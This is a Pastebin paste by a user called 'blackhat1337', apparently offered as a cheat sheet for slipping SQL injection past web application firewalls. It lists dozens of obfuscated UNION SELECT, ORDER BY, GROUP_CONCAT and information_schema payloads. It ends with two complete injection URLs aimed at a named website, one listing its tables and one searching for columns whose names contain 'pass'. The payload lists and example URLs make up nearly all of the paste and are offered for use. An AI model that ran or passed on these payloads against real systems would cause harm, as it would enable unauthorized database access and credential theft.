API tools faq
paste
blackhat1337

sal

blackhat1337
Mar 27th, 2024
156
0
Never
Add comment
Not a member of Pastebin yet? Sign Up, it unlocks many cool features!
text 10.60 KB | None | 0 0
raw download clone embed print report
  1. byPassing Cheat Sheet Of ALL WAF
  2.  
  3.  
  4.  
  5. Cheat Sheet Of UNION SELECT:::
  6. This is The List of By Pass Union Select ::
  7. ----------------------------------------------------------------------------------------------------------------
  8.  
  9. +union+distinct+select+
  10.  
  11. +union+distinctROW+select+
  12.  
  13. /**//*!12345UNION SELECT*//**/
  14.  
  15. /**//*!50000UNION SELECT*//**/
  16.  
  17. +/*!50000UnIoN*/ /*!50000SeLeCt aLl*/+
  18.  
  19. +/*!u%6eion*/+/*!se%6cect*/+
  20.  
  21. /**/uniUNIONon/**/aALLll/**/selSELECTect/**/
  22.  
  23. 1%')and(0)union(select(1),version(),3,4,5,6)%23%23%23
  24.  
  25. /*!50000%55nIoN*/+/*!50000%53eLeCt*/
  26.  
  27. union /*!50000%53elect*/
  28.  
  29. %55nion %53elect
  30.  
  31. +--+Union+--+Select+--+
  32.  
  33. +UnIoN/*&a=*/SeLeCT/*&a=*/
  34.  
  35. id=1+?UnI?On?+'SeL?ECT?
  36.  
  37. id=1+'UnI'||'on'+SeLeCT'
  38.  
  39. UnIoN SeLeCt CoNcAt(version())--
  40.  
  41. uNiOn aLl sElEcT
  42.  
  43. uUNIONnion all sSELECTelect
  44.  
  45. /*union*/union/*select*/select+1,2,3/*
  46.  
  47. /*uniXon*/union/*selXect*/select+1,2/*
  48.  
  49. un/**/ion+sel/**/ect
  50.  
  51. +#1q%0Aunion all#qa%0A#%0Aselect
  52.  
  53. union /*!select*/+
  54.  
  55. union/**/select/**/
  56.  
  57. /**/union/**/select/**/
  58.  
  59. /**/union/*!50000select*/
  60.  
  61. /**//*!12345UNION SELECT*//**/
  62.  
  63. /**//*!50000UNION SELECT*//**/
  64.  
  65. /**/uniUNIONon/**/selSELECTect/**/
  66.  
  67. /**/uniUNIONon/**/aALLll/**/selSELECTect/**/
  68.  
  69. /**//*!union*//**//*!select*//**/
  70.  
  71. /**/UNunionION/**/SELselectECT/**/
  72.  
  73. /**//*UnIOn*//**//*SEleCt*//**/
  74.  
  75. /**//*U*//*n*//*I*//*O*//*n*//**//*S*//*E*//*l*//*e*//*C*//*t*//**/
  76.  
  77. /**/UNunionION/**/all/**/SELselectECT/**/
  78.  
  79. /**//*UnIOn*//**/all/**//*SEleCt*//**/
  80.  
  81. /**//*U*//*n*//*I*//*O*//*n*//**//*all*//**//*S*//*E*//*l*//*e*//*C*//*t*//**/
  82.  
  83. uni
  84.  
  85. %20union%20/*!select*/%20
  86.  
  87. union%23aa%0Aselect
  88.  
  89. union+distinct+select+
  90.  
  91. union+distinctROW+select+
  92.  
  93. /*!20000%0d%0aunion*/+/*!20000%0d%0aSelEct*/
  94.  
  95. %252f%252a*/UNION%252f%252a /SELECT%252f%252a*/
  96.  
  97. %23sexsexsex%0AUnIOn%23sexsexsex%0ASeLecT+
  98.  
  99. /*!50000UnIoN*/ /*!50000SeLeCt aLl*/+
  100.  
  101. /*!u%6eion*/+/*!se%6cect*/+
  102.  
  103. 1%?)and(0)union(select(1),version(),3,4,5,6)%23%23%23
  104.  
  105. /*!50000%55nIoN*/+/*!50000%53eLeCt*/
  106.  
  107. union /*!50000%53elect*/
  108.  
  109. +%2F**/+Union/*!select*/
  110.  
  111. %55nion %53elect
  112.  
  113. +?+Union+?+Select+?+
  114.  
  115. +UnIoN/*&a=*/SeLeCT/*&a=*/
  116.  
  117. uNiOn aLl sElEcT
  118.  
  119. uUNIONnion all sSELECTelect
  120.  
  121. union(select(1),2,3)
  122.  
  123. union (select 1111,2222,3333)
  124.  
  125. union (/*!/**/ SeleCT */ 11)
  126.  
  127. %0A%09UNION%0CSELECT%10NULL%
  128.  
  129. /*!union*//*?*//*!all*//*?*//*!select*/
  130.  
  131. union%23foo*%2F*bar%0D%0Aselect%23foo%0D%0A1% 2C2%2C
  132.  
  133. union+sel%0bect
  134.  
  135. +uni*on+sel*ect+
  136.  
  137. +#1q%0Aunion all#qa%0A#%0Aselect 1,2,3,4,5,6,7,8,9,10%0A#a
  138.  
  139. union(select (1),(2),(3),(4),(5))
  140.  
  141. UNION(SELECT(column)FROM(table))
  142.  
  143. id=1+?UnI?On?+?SeL?ECT?
  144.  
  145. id=1+?UnI?||?on?+SeLeCT?
  146.  
  147. union select 1?+%0A,2?+%0A,3?+%0A etc ?
  148.  
  149. /*!00000Union*/ /*!00000Select*/
  150.  
  151. /*!50000%55nIoN*/ /*!50000%53eLeCt*/
  152.  
  153. %55nion %53elect
  154.  
  155. %55nion(%53elect 1,2,3)-- -
  156.  
  157. +union+distinct+select+
  158.  
  159. +union+distinctROW+select+
  160.  
  161. /**//*!12345UNION SELECT*//**/
  162.  
  163. /**//*!50000UNION SELECT*//**/
  164.  
  165. /**/UNION/**//*!50000SELECT*//**/
  166.  
  167. /*!50000UniON SeLeCt*/
  168.  
  169. union /*!50000%53elect*/
  170.  
  171. + #?uNiOn + #?sEleCt
  172.  
  173. + #?1q %0AuNiOn all#qa%0A#%0AsEleCt
  174.  
  175. /*!%55NiOn*/ /*!%53eLEct*/
  176.  
  177. /*!u%6eion*/ /*!se%6cect*/
  178.  
  179. +un/**/ion+se/**/lect
  180.  
  181. uni%0bon+se%0blect
  182.  
  183. %2f**%2funion%2f**%2fselect
  184.  
  185. union%23foo*%2F*bar%0D%0Aselect%23foo%0D%0A
  186.  
  187. REVERSE(noinu)+REVERSE(tceles)
  188.  
  189. /*--*/union/*--*/select/*--*/
  190.  
  191. union (/*!/**/ SeleCT */ 1,2,3)
  192.  
  193. /*!union*/+/*!select*/
  194.  
  195. union+/*!select*/
  196.  
  197. /**/union/**/select/**/
  198.  
  199. /**/uNIon/**/sEleCt/**/
  200.  
  201. +%2F**/+Union/*!select*/
  202.  
  203. /**//*!union*//**//*!select*//**/
  204.  
  205. /*!uNIOn*/ /*!SelECt*/
  206.  
  207. +union+distinct+select+
  208.  
  209. +union+distinctROW+select+
  210.  
  211. uNiOn aLl sElEcT
  212.  
  213. UNIunionON+SELselectECT
  214.  
  215. /**/union/*!50000select*//**/
  216.  
  217. 0%a0union%a0select%09
  218.  
  219. %0Aunion%0Aselect%0A
  220.  
  221. %55nion/**/%53elect
  222.  
  223. uni/*!20000%0d%0aunion*/+/*!20000%0d%0aSelEct*/
  224.  
  225. %252f%252a*/UNION%252f%252a /SELECT%252f%252a*/
  226.  
  227. %0A%09UNION%0CSELECT%10NULL%
  228.  
  229. /*!union*//*--*//*!all*//*--*//*!select*/
  230.  
  231. union%23foo*%2F*bar%0D%0Aselect%23foo%0D%0A1% 2C2%2C
  232.  
  233. /*!20000%0d%0aunion*/+/*!20000%0d%0aSelEct*/
  234.  
  235. +UnIoN/*&a=*/SeLeCT/*&a=*/
  236.  
  237. union+sel%0bect
  238.  
  239. +uni*on+sel*ect+
  240.  
  241. +#1q%0Aunion all#qa%0A#%0Aselect
  242.  
  243. union(select (1),(2),(3),(4),(5))
  244.  
  245. UNION(SELECT(column)FROM(table))
  246.  
  247. %23xyz%0AUnIOn%23xyz%0ASeLecT+
  248.  
  249. %23xyz%0A%55nIOn%23xyz%0A%53eLecT+
  250.  
  251. union(select(1),2,3)
  252.  
  253. union (select 1111,2222,3333)
  254.  
  255. uNioN (/*!/**/ SeleCT */ 11)
  256.  
  257. union (select 1111,2222,3333)
  258.  
  259. +#1q%0AuNiOn all#qa%0A#%0AsEleCt
  260.  
  261. /**//*U*//*n*//*I*//*o*//*N*//*S*//*e*//*L*//*e*//*c*//*T*/
  262.  
  263. %0A/**//*!50000%55nIOn*//*yoyu*/all/**/%0A/*!%53eLEct*/%0A/*nnaa*/
  264.  
  265. +%23sexsexsex%0AUnIOn%23sexsexs ex%0ASeLecT+
  266.  
  267. +union%23foo*%2F*bar%0D%0Aselect%23foo%0D%0A1% 2C2%2C
  268.  
  269. /*!f****U%0d%0aunion*/+/*!f****U%0d%0aSelEct*/
  270.  
  271. +%23blobblobblob%0aUnIOn%23blobblobblob%0aSeLe cT+
  272.  
  273. /*!blobblobblob%0d%0aunion*/+/*!blobblobblob%0d%0aSelEct*/
  274.  
  275. /union\sselect/g
  276.  
  277. /union\s+select/i
  278.  
  279. /*!UnIoN*/SeLeCT
  280.  
  281. +UnIoN/*&a=*/SeLeCT/*&a=*/
  282.  
  283. +uni>on+sel>ect+
  284.  
  285. +(UnIoN)+(SelECT)+
  286.  
  287. +(UnI)(oN)+(SeL)(EcT)
  288.  
  289. +?UnI?On?+'SeL?ECT?
  290.  
  291. +uni on+sel ect+
  292.  
  293. +/*!UnIoN*/+/*!SeLeCt*/+
  294.  
  295. /*!u%6eion*/ /*!se%6cect*/
  296.  
  297. uni%20union%20/*!select*/%20
  298.  
  299. union%23aa%0Aselect
  300.  
  301. /**/union/*!50000select*/
  302.  
  303. /^.*union.*$/ /^.*select.*$/
  304.  
  305. /*union*/union/*select*/select+
  306.  
  307. /*uni X on*/union/*sel X ect*/
  308.  
  309. +un/**/ion+sel/**/ect+
  310.  
  311. +UnIOn%0d%0aSeleCt%0d%0a
  312.  
  313. UNION/*&test=1*/SELECT/*&pwn=2*/
  314.  
  315. un?+un/**/ion+se/**/lect+
  316.  
  317. +UNunionION+SEselectLECT+
  318.  
  319. +uni%0bon+se%0blect+
  320.  
  321. %252f%252a*/union%252f%252a /select%252f%252a*/
  322.  
  323. /%2A%2A/union/%2A%2A/select/%2A%2A/
  324.  
  325. %2f**%2funion%2f**%2fselect%2f**%2f
  326.  
  327. union%23foo*%2F*bar%0D%0Aselect%23foo%0D%0A
  328.  
  329. /*!UnIoN*/SeLecT+
  330.  
  331. -----------------------------------------------------------------------------------------------------------------------
  332.  
  333. Union Select by PASS with Url Encoded Method:
  334.  
  335. -----------------------------------------------------------------------------------------------------------------------
  336.  
  337. %55nion(%53elect)
  338.  
  339. union%20distinct%20select
  340.  
  341. union%20%64istinctRO%57%20select
  342.  
  343. union%2053elect
  344.  
  345. %23?%0auion%20?%23?%0aselect
  346.  
  347. %23?zen?%0Aunion all%23zen%0A%23Zen%0Aselect
  348.  
  349. %55nion %53eLEct
  350.  
  351. u%6eion se%6cect
  352.  
  353. unio%6e %73elect
  354.  
  355. unio%6e%20%64istinc%74%20%73elect
  356.  
  357. uni%6fn distinct%52OW s%65lect
  358.  
  359. %75%6e%6f%69%6e %61%6c%6c %73%65%6c%65%63%7
  360.  
  361.  
  362. ---------------------------------------------------------------------------------------------------------------------
  363.  
  364. Cheat Sheet of Bypassing Of Order by And Group By
  365. ---------------------------------------------------------------------------------------------------------------------
  366.  
  367. order by/**_**/
  368.  
  369. /*!12345order*/ /*!12345by*/
  370.  
  371. ) order by 1-- -
  372.  
  373. ') order by 1-- -
  374.  
  375.  
  376. ')order by 1%23%23
  377.  
  378.  
  379. %')order by 1%23%23
  380.  
  381.  
  382. Null' order by 100--+
  383.  
  384.  
  385. Null' order by 9999--+
  386.  
  387.  
  388. ')group by 99-- -
  389.  
  390.  
  391. 'group by 119449-- -
  392.  
  393.  
  394. 'group/**/by/**/99%23%23
  395.  
  396. ------------------------------------------------------------------------------------------------------------------------Concat And Group_concat By Pass cheat Sheet ::
  397.  
  398. ------------------------------------------------------------------------------------------------------------------------
  399.  
  400.  
  401.  
  402. /*!12345group_concat*/(/*!12345table_name*/)
  403.  
  404. /*!50000group_concat*/(/*!50000table_name*/)
  405.  
  406. /*!GrOuP_ConCaT*/()
  407.  
  408. /*!12345GroUP_ConCat*/()
  409.  
  410. /*!50000gRouP_cOnCaT*/()
  411.  
  412. /*!50000Gr%6fuP_c%6fnCAT*/()
  413.  
  414. /*!group_concat*/()
  415.  
  416. gRoUp_cOnCAt()
  417.  
  418. group_concat(/*!*/)
  419.  
  420. group_concat(/*!12345table_name*/)
  421.  
  422. group_concat(/*!50000table_name*/)
  423.  
  424. /*!group_concat*/(/*!12345table_name*/)
  425.  
  426. /*!group_concat*/(/*!50000table_name*/)
  427.  
  428. unhex(hex(group_concat(table_name)))
  429.  
  430. unhex(hex(/*!group_concat*/(/*!table_name*/)))
  431.  
  432. unhex(hex(/*!12345group_concat*/(table_name)))
  433.  
  434. unhex(hex(/*!12345group_concat*/(/*!table_name*/)))
  435.  
  436. unhex(hex(/*!12345group_concat*/(/*!12345table_name*/)))
  437.  
  438. unhex(hex(/*!50000group_concat*/(table_name)))
  439.  
  440. unhex(hex(/*!50000group_concat*/(/*!table_name*/)))
  441.  
  442. unhex(hex(/*!50000group_concat*/(/*!50000table_name*/)))
  443.  
  444. CONVERT(group_concat(table_name)+USING+latin1)
  445.  
  446. CONVERT(group_concat(table_name)+USING+latin2)
  447.  
  448. CONVERT(group_concat(table_name)+USING+latin3)
  449.  
  450. CONVERT(group_concat(table_name)+USING+latin4)
  451.  
  452. CONVERT(group_concat(table_name)+USING+latin5)
  453.  
  454. convert(group_concat(table_name)+using+ascii)
  455.  
  456. convert(group_concat(/*!table_name*/)+using+ascii)
  457.  
  458. convert(group_concat(/*!12345table_name*/)+using+ascii)
  459.  
  460. convert(group_concat(/*!50000table_name*/)+using+ascii)
  461.  
  462. /*!concat_ws(0x3a,)*/
  463.  
  464. concat_ws(0x3a3a3a,version()
  465.  
  466. CONCAT_WS(CHAR(32,58,32),version(),)
  467.  
  468. ----------------------------------------------------------------------------------------------------------------
  469.  
  470. How to By Pass Tables:::
  471.  
  472. ---------------------------------------------------------------------------------------------------------------
  473.  
  474. group_concat(/*!table_name*/)
  475.  
  476.  
  477. +/*!froM*/ /*!InfORmaTion_scHema*/.tAblES? -
  478.  
  479.  
  480. /*!froM*/ /*!InfORmaTion_scHema*/.tAblES /*!WhERe*//*!TaBle_ScHEmA*/=schEMA()?
  481.  
  482. /*!From*/+%69nformation_schema./**/tAblES+/*!50000Where*/+/*!%54able_ScHEmA*/=schEMA()? -
  483.  
  484. ===========================================================
  485.  
  486. How to By Pass Columns:::
  487.  
  488. ===========================================================
  489.  
  490. group_concat(/*!column_name*/)
  491.  
  492. +/*!froM*/ InfORmaTion_scHema.cOlumnS /*!WheRe*/ /*!tAblE_naMe*/=hex table
  493.  
  494. /*!From*/+%69nformation_schema./**/columns+/*!50000Where*/+/*!%54able_name*/=hex table/*!froM*/ table? -
  495.  
  496.  
  497.  
  498. ========================================================================
  499.  
  500. URL enCoded By passing Table and columns::
  501.  
  502. ===========================================================
  503.  
  504.  
  505. (select+group_concat(/*!table_name*/)+/*!From*/+%69nformation_schema./**/tAblES+/*!50000Where*/+/*!%54able_ScHEmA*/=schEMA())
  506. (select+group_concat(/*!column_name*/)+/*!From*/+%69nformation_schema./**/columns+/*!50000Where*/+/*!%54able_name*/=hex table)
  507. like
  508. http://www.marinaplast.com/page.php?id=-13 union select 1,2,(select+group_concat(/*!table_name*/)+/*!From*/+%69nformation_schema./**/tAblES+/*!50000Where*/+/*!%54able_ScHEmA*/=schEMA()),4,5 ?
  509.  
  510.  
  511. ========================================================================
  512.  
  513. illegal mix of Collations ByPass ::
  514.  
  515. ========================================================================
  516.  
  517. bypass method
  518.  
  519.  
  520. unhex(hex(Concat(Column_Name,0x3e,Table_schema,0x3e,table_Name)))
  521. /*!from*/information_schema.columns/*!where*/column_name%20/*!like*/char(37,%20112,%2097,%20115,%20115,%2037)
  522.  
  523.  
  524. http://www.marinaplast.com/page.php?id=-13 union select 1,2,unhex(hex(Concat(Column_Name,0x3e,Table_schema,0x3e,table_Name))),4,5 /*!from*/information_schema.columns/*!where*/column_name%20/*!like*/char(37,%20112,%2097,%20115,%20115,%2037)?
Add Comment
Please, Sign In to add comment
Public Pastes
We use cookies for various purposes including analytics. By continuing to use Pastebin, you agree to our use of cookies as described in the Cookies Policy.  OK, I Understand
Not a member of Pastebin yet?
Sign Up, it unlocks many cool features!